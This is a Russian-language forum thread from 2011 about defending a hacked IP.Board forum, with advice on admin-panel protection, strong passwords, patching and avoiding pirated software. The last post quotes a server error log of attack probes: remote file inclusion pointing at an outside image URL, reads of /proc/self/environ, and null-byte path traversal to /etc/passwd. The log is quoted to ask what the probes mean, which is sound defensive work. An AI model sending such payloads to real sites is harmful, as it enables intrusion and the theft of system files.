Morty 0 04/03/2011 02:19 AM Помогите пожалуйста защитится от хакинга.Сосбтвенно адрес _http://help-icq.ru Share this post Link to post
Креол 19 04/03/2011 05:57 AM Дырки есть в любом проекте, так что самое первое и основное что можно и нужно сделать - это поменять путь к админке, и защитить ее методом .htpasswd Share this post Link to post
Ph-A 395 04/03/2011 06:48 AM Помогите пожалуйста защитится от хакинга.Использовать нормальный хостинг. Не использовать нуленные программы. Если в непонятно откуда скачанных DLE или в IP.Board - е уже предусмотрен черный ход, то не защитится уже не чем. Хуки скачивать только с официальных сайтов. Взломов через хуки еще не видел, но возможность вполне вероятная. Ну естественно следить за обновлением используемых официальных программ. И все. Сломать нормальный пропаченный IP.Board очень сложно. Share this post Link to post
Morty 0 04/03/2011 07:00 AM Дырки есть в любом проекте, так что самое первое и основное что можно и нужно сделать - это поменять путь к админке, и защитить ее методом .htpasswdМожно подробнее про .htpasswd? Share this post Link to post
Ph-A 395 04/03/2011 07:13 AM Можно подробнее про .htpasswdAuth - защита паролем - но мертвому припарка. IPS после 2.3 про такую защиту забыла. Эффекта он нее не много. Если форум дырявый, я прямыми запросами к базе данных его положу, без захода в АЦ. Если хостер дырявый, то .htpasswd и .htacces стираются без проблем. Если взлом по ftp, то в АЦ заходов не бывает. Share this post Link to post
Morty 0 04/03/2011 07:16 AM Auth - защита паролем - но мертвому припарка. IPS после 2.3 про такую защиту забыла. Эффекта он нее не много. Если форум дырявый, я прямыми запросами к базе данных его положу, без захода в АЦ. Если хостер дырявый, то .htpasswd и .htacces стираются без проблем. Если взлом по ftp, то в АЦ заходов не бывает.Вродебы там всё намного проще.Я сейчас посмотрел логи входа в админку.Походу тот кто напакостил узнал пароль админа (второго) и через его акк всё сделал.Так как мой акк был удалён, а его нет.так что админку защитить я считаю имеет смысл. Share this post Link to post
Ph-A 395 04/03/2011 07:28 AM Походу тот кто напакостил узнал пароль админа (второго) и через его акк всё сделал.Узнать пароль к htpasswd так же можно. Так как мой акк был удалён, а его нет.так что админку защитить я считаю имеет смысл.Это ложное ощущение безопасности. Но лишняя защита не когда не бывает лишней. Хотя проще, ограничить по минимуму количество людей с доступом в АЦ.Пароль должен быть реально сложный. У админа "логин" и "отображаемое имя" никогда не должны совпадать. Я не использую htpasswd. Так как мой акк был удалён, а его нет.А смысл его при взломе, было оставлять? Чтобы восстановить было проще? Share this post Link to post
Fisana 700 04/03/2011 09:17 AM Тема может пригодиться другим. Любая тема, где есть полезные советы. Share this post Link to post
Morty 0 04/03/2011 09:33 AM Я ведь не сказал "тему можно удалить".Тема ведь останется. А если у кого-то будет похожий вопрос то создаст новую... Share this post Link to post
Ritsuka 540 04/03/2011 08:16 PM Самое неприятное в любом взломе - это не факт самого взлома, а неизвестность:- Кто и как именно взломал?- Какой уровень доступа получил?- С какой целью?- Что именно и в каком количестве сделано?- Не оставлено ли закладок "на будущее"? Не найдя точные достоверные ответы, нельзя гарантировать, что взлом не повторится вновь. Если хотя бы на один из вопросов ответа нет - проводить полный аудит безопасности всего и вся, долго и основательно. С сабжевого форума поржал. Share this post Link to post
Ph-A 395 04/04/2011 05:58 AM проводить полный аудит безопасности Смысл? Если с самого начала была высокая вероятность закладки. Share this post Link to post
Ritsuka 540 04/04/2011 08:08 AM А я и не про этот форум пишу. Топикстартер тут и не появится более, скорее всего, он же свою проблему "решил". А там у него - да, конечно, проверять смысла нет. Судя по всему, пиратская говносборка какого-то очередного "хакера", изначально напичканная левыми модами и правками. Да и сам форум такой форум - такая тематика, такой контент. В одной из тех с половиной тем, кажется, сам админ выкладывает т.н. "пинч" - генератор трояна, ворующего cookies, причем выкладывает в бинарном виде. Думаю, вы все понимаете и относительно форума, и относительно методики "взлома"? Тут и "закаладки" не нужны, с такими админами)) Share this post Link to post
Bonov 13 04/05/2011 11:44 AM День добрый. Сегодня ночью посыпались ошибки следующего вида. Кто-то очень хотел найти какую-то уязвимость или что-то еще? Что за параметр "k"? Кто может прокомментировать? Спасибо. Выдержки из лога. Всего было 108 строк. Полный лог во вложении. log_id log_member log_date log_error log_error_code log_ip_address log_request_uri18 0 1301948884 Очистить cookies не удалось. Ссылка «Очистить cookies» имеет неверный формат. Пожалуйста, вернитесь назад и попробуйте еще раз.<br /><br /> 2010 84.20.133.65 /index.php?app=core&module=global§ion=login&do=deleteCookies&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?19 0 1301948886 Очистить cookies не удалось. Ссылка «Очистить cookies» имеет неверный формат. Пожалуйста, вернитесь назад и попробуйте еще раз.<br /><br /> 2010 84.20.133.65 /index.php?app=core&module=global§ion=login&do=deleteCookies&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%0020 0 1301948886 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=unlockStatus&status_id=32&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?21 0 1301948888 Очистить cookies не удалось. Ссылка «Очистить cookies» имеет неверный формат. Пожалуйста, вернитесь назад и попробуйте еще раз.<br /><br /> 2010 84.20.133.65 /index.php?app=core&module=global§ion=login&do=deleteCookies&k=/proc/self/environ22 0 1301948888 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=unlockStatus&status_id=32&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%0023 0 1301948888 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=lockStatus&status_id=32&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?24 0 1301948889 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=unlockStatus&status_id=30&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?25 0 1301948889 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=lockStatus&status_id=30&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif?26 0 1301948890 Очистить cookies не удалось. Ссылка «Очистить cookies» имеет неверный формат. Пожалуйста, вернитесь назад и попробуйте еще раз.<br /><br /> 2010 84.20.133.65 /index.php?app=core&module=global§ion=login&do=deleteCookies&k=/proc/self/environ%0027 0 1301948890 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=unlockStatus&status_id=32&k=/proc/self/environ28 0 1301948890 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=lockStatus&status_id=32&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%0029 0 1301948891 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=unlockStatus&status_id=30&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%0030 0 1301948891 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=lockStatus&status_id=30&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%0031 0 1301948891 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=unlockStatus&status_id=32&k=/proc/self/environ%0032 0 1301948892 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=lockStatus&status_id=30&k=/proc/self/environ33 0 1301948892 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=unlockStatus&status_id=28&k=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif? ... 123 0 1301948950 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=unlockStatus&status_id=32&k=/../../../../../../../../../../etc/passwd124 0 1301948952 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=unlockStatus&status_id=32&k=../../../../../../../../../../etc/passwd%00125 0 1301948954 К сожалению вы не можете воспользоваться этой возможностью. Если вы еще не вошли на форум, возможно, сделав это вы сможете воспользоваться ей.<br /><br /> 20314 84.20.133.65 /index.php?app=members&module=profile§ion=status&do=unlockStatus&status_id=32&k=/../../../../../../../../../../etc/passwd%00error_logs.rar Share this post Link to post
